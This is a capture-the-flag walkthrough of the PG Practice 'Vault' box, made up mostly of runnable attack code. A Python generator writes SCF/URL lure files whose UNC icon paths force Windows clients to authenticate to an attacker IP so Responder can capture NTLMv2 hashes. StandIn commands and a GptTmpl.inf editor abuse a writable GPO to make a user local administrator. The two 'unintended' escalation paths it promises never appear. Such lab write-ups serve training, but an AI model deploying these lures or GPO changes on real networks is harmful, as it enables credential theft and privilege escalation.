Stealing Hashes with Responder, GPO Permissions & Unintended Ways - Vault @ PG Practice

We are solving Vault from PG Practice. Initial access comes from planting lure files (SCF/LNK/URL) on a writable SMB share: when a user browses the share, Windows resolves the UNC icon path they contain and authenticates to our Responder listener, leaking an NTLMv2 hash. For privilege escalation we abuse GPO permissions (our user has write rights over a GPO, which lets us push a local-administrator policy to the box) and then explore two unintended escalation paths.

Notes

Creating scf/lnk/url files via hashgrab (first argument is the attacker IP that Responder is listening on, second is the file name prefix; drop the generated files onto the writable share and wait for a user to browse it):

# generates @xct.scf, @xct.lnk and @xct.url pointing at \\<ip>\...
python3 ~/tools/hashgrab/hashgrab.py <ip> xct
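The lure mechanism itself, as an added example (this is not hashgrab's code): each file carries an IconFile pointing at a UNC path on the attacker host, so Explorer opens an SMB session to fetch the "icon" and Responder captures the NTLMv2 response. The attacker IP 10.10.14.5, the share name, and the output prefix are placeholders chosen here; the leading "@" in the file name only serves to sort the lure to the top of a directory listing. Which file type actually fires depends on the victim's Windows build, so in practice all of them are planted.

```python
"""Generate .scf and .url lure files that coerce SMB authentication to an attacker host.

Added example, not hashgrab's own code. Attacker IP, share name and prefix are
placeholders; the .lnk variant is a binary format and is left out here.
"""
import re
import tempfile
from pathlib import Path


def scf_payload(attacker_ip: str, share: str = "share") -> str:
    # Shell Command File: Explorer resolves IconFile as soon as the folder is listed.
    return (
        "[Shell]\r\n"
        "Command=2\r\n"
        f"IconFile=\\\\{attacker_ip}\\{share}\\icon.ico\r\n"
        "[Taskbar]\r\n"
        "Command=ToggleDesktop\r\n"
    )


def url_payload(attacker_ip: str, share: str = "share") -> str:
    # Internet Shortcut: the URL is irrelevant, the UNC IconFile is what triggers auth.
    return (
        "[InternetShortcut]\r\n"
        "URL=http://example.invalid\r\n"
        "IconIndex=1\r\n"
        f"IconFile=\\\\{attacker_ip}\\{share}\\icon.ico\r\n"
    )


def unc_targets(text: str) -> list:
    """Return the hosts referenced by UNC paths in a lure (sanity check before planting)."""
    return re.findall(r"\\\\([^\\]+)\\", text)


def write_lures(attacker_ip: str, out_dir: str, prefix: str = "@readme") -> dict:
    """Write one lure per type into out_dir and return {extension: Path}."""
    out = Path(out_dir)
    out.mkdir(parents=True, exist_ok=True)
    written = {}
    for ext, builder in (("scf", scf_payload), ("url", url_payload)):
        path = out / f"{prefix}.{ext}"
        path.write_bytes(builder(attacker_ip).encode("utf-8"))
        written[ext] = path
    return written


def demo_write(attacker_ip: str = "10.10.14.5") -> dict:
    """Write the lures to a temporary directory (placeholder IP; constructed demo)."""
    return write_lures(attacker_ip, tempfile.mkdtemp())


if __name__ == "__main__":
    for ext, path in demo_write().items():
        print(ext, path, unc_targets(path.read_text()))
```

Copy the resulting files to the share (for example with smbclient) and start Responder on the interface facing the target; the captured NTLMv2-SSP hash can then be cracked offline.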

GPO Abuse via standin (list the GPOs, check which ones our user can write to, then push a policy that adds our user to the local Administrators group and force a refresh; the new group membership applies to the computer on the next policy refresh, so a new logon or session may be needed before the token carries it):

# enumerate all GPOs in the domain
.\standin --gpo
# show the ACL of the target GPO: look for WriteDacl / WriteProperty / GenericWrite for our user
.\standin --gpo --filter "Default Domain Policy" --acl
# add the user to local Administrators through the writable GPO
.\standin --gpo --filter "Default Domain Policy" --localadmin anirudh
# force the machine to pull and apply the modified policy
cmd /c "gpupdate /force"
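What a write-capable user actually changes in the GPO, as an added example (this is not StandIn's code and does not reproduce its exact behaviour): a local-admin push of this kind is a Restricted Groups entry in the policy's GptTmpl.inf under the SYSVOL path Machine\Microsoft\Windows NT\SecEdit\ of the GPO's GUID folder. The sample template and the member SID below are constructed for the demo. A full tool also bumps the GPO version number and lists the security-settings client-side extension in gPCMachineExtensionNames so clients process the file; that part is left out here.

```python
"""Add a SID to the local Administrators Restricted Groups entry of a GptTmpl.inf.

Added example, not StandIn's code. The template text and member SID are
constructed; a real GPO's GptTmpl.inf lives in SYSVOL at
\\<domain>\Policies\{<gpo-guid>}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf.
"""
import configparser
import io

LOCAL_ADMINS_SID = "S-1-5-32-544"   # BUILTIN\Administrators, same SID on every host
SECTION = "Group Membership"

# Constructed minimal GptTmpl.inf, as a GPO with no security settings would have it.
SAMPLE_INF = (
    "[Unicode]\r\n"
    "Unicode=yes\r\n"
    "[Version]\r\n"
    "signature=\"$CHICAGO$\"\r\n"
    "Revision=1\r\n"
)


def _parse(inf_text: str) -> configparser.ConfigParser:
    # GptTmpl.inf is INI-like; keep key case and do not expand "$CHICAGO$".
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(inf_text)
    return cp


def add_local_admin(inf_text: str, member_sid: str, group_sid: str = LOCAL_ADMINS_SID) -> str:
    """Return the template with member_sid appended to the group's Members list."""
    cp = _parse(inf_text)
    if not cp.has_section(SECTION):
        cp.add_section(SECTION)
    members_key = f"*{group_sid}__Members"
    memberof_key = f"*{group_sid}__Memberof"
    members = [m.strip() for m in cp.get(SECTION, members_key, fallback="").split(",") if m.strip()]
    entry = f"*{member_sid}"
    if entry not in members:           # idempotent: re-running does not duplicate the SID
        members.append(entry)
    cp.set(SECTION, members_key, ",".join(members))
    if not cp.has_option(SECTION, memberof_key):
        cp.set(SECTION, memberof_key, "")
    buf = io.StringIO()
    cp.write(buf, space_around_delimiters=True)
    return buf.getvalue()


def local_admins(inf_text: str) -> list:
    """SIDs the policy will enforce as the exact membership of local Administrators."""
    cp = _parse(inf_text)
    raw = cp.get(SECTION, f"*{LOCAL_ADMINS_SID}__Members", fallback="")
    return [m.strip().lstrip("*") for m in raw.split(",") if m.strip()]


if __name__ == "__main__":
    modified = add_local_admin(SAMPLE_INF, "S-1-5-21-1-2-3-1105")  # constructed user SID
    print(modified)
    print("enforced local admins:", local_admins(modified))
```

Two things a practitioner should check before using this on an engagement: the Members list is enforced as the complete membership, so any existing local administrators not listed are removed on the next refresh, and the change lands on every computer the GPO is linked to, not just the one box being attacked. Both are why the original entries are read and preserved above rather than overwritten.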

Other resources:

This post is licensed under CC BY 4.0 by the author.